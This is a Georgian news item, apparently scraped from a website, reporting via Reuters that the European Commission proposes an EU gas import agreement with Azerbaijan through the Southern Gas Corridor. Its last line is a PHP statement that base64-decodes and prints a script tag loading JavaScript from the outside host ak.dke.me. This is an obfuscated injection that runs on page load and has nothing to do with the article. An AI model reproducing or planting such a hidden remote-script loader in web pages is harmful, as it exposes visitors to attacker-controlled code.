celsiusi
ავერსი საქკაბელი

ევროკომისიამ ევროკავშირის ქვეყნებს შესთავაზა, ბუნებრივი აირის იმპორტთან დაკავშირებით შეთანხმება გააფორმონ აზერბაიჯანთან. ინფორმაციას „როიტერი“ ავრცელებს, რომელიც აღნიშნულ დოკუმენტს გაეცნო.

„მხარეები ცდილობენ, გააფართოონ ბუნებრივი აირით ორმხრივი ვაჭრობა, მათ შორის ევროკავშირში ექსპორტის ხარჯზე, სამხრეთ გაზის დერეფნით, რომლის მოცულობაც ყოველწლიურად არანაკლებ 20 მილიარდი კუბმეტრია და ეს 2027 წლამდე უნდა გაგრძელდეს.“, – ნათქვამია დოკუმენტის პროექტში.

გასულ წელს ევროპულ ქვეყნებში, როგორიცაა იტალია, ტრანსადრიატიკული მილსადენით აზერბაიჯანიდან რვა მილიარდი კუბმეტრი ბუნებრივი აირის ექსპორტი განხორციელდა.

607
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");